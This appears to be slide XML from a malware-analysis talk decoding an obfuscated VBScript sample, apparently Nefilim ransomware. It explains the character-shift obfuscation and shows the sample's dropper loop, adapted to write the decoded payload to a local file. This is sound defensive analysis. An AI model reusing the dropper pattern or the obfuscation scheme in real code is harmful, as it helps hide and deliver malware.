              </a:rPr>
              <a:t>	Lookup 70 at asciitable.com == "F"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	myReturnValue=("F")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Second value 124, subtract 7 == 117</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Lookup 117 at asciitable.com == "u"</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	myReturnValue=("Fu")</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hahaha… of course you were thinking the first word decodes to "Function" right?</a:t>
            </a:r>
            <a:endParaRPr>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28" name="Shape 228"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;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Manually is way too slow, but it's a good confirmation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember that I used grep to pull all of the assignments (the arrays) and put them into a separate file?</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We can take those assignment statements and add our myDecoder() function and call it with a couple of lines of code:</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myTest1=myDecoder(rSltLvql)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wscript.echo(myTest1)</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Polymorphism Definition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Wikipedia:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In computing, polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact - that is, the code changes itself every time it runs, but the function of the code (its semantics) will not change at all.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Polymorphic_code</a:t>
            </a:r>
            <a:endParaRPr>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34" name="Shape 234"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;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 it with wscript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;wscript test1.vbs //x</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="237" name="Google Shape;237;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="445231" y="1579550"/>
            <a:ext cx="6697324" cy="31450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41" name="Shape 241"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Google Shape;242;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WTF?  more comments?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;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4" name="Google Shape;244;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393626" y="1152476"/>
            <a:ext cx="7290675" cy="34850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48" name="Shape 248"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Google Shape;249;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hmm… SaveToFile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;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1" name="Google Shape;251;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="379325" y="1166800"/>
            <a:ext cx="8199360" cy="3416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55" name="Shape 255"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;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look at that For loop</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note there are actually over 500 things in that array, I jut have word wrap off so we can see the code better.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So what's going on here is we are looping through the 538 elements of that array, sending each element to our decoder function, and storing the output (.WriteText)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258;p45"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8373723" cy="14192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62" name="Shape 262"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;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 what's in rUM?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;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265" name="Google Shape;265;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311706" y="1152481"/>
            <a:ext cx="8456300" cy="26756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69" name="Shape 269"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="455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decode it - Take #1, failed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;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myTest1=myDecoder(rUM)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wscript.echo(myTest1)</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a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="272" name="Google Shape;272;p47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984875" y="2110983"/>
            <a:ext cx="2545275" cy="23384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76" name="Shape 276"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;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decode it - Take #2 - Use their code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;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852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Function my_f_dropper()</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Dim myOutput:</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Set myOutput = CreateObject("ADODB.Stream")</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    With myOutput</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .Type = 2</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .Charset = "ISO-8859-1"</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .Open()</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 For Each codeposit in Array(rUM, dPO, XRbN, &lt;&lt;&lt;snipped&gt;&gt;&gt;, zhcBS, yOFY, fPn, qPPJ)</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   		 .WriteText myDecoder(codeposit)</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 Next</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .Position = 0</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .SaveToFile "C:\Users\john\Downloads\samples\20211129_nefilim\" + "droppedFile1.txt", 2</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   	 .Close</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    End With</a:t>
            </a:r>
            <a:endParaRPr sz="1495">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1495">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Function    </a:t>
            </a:r>
            <a:endParaRPr sz="1495">
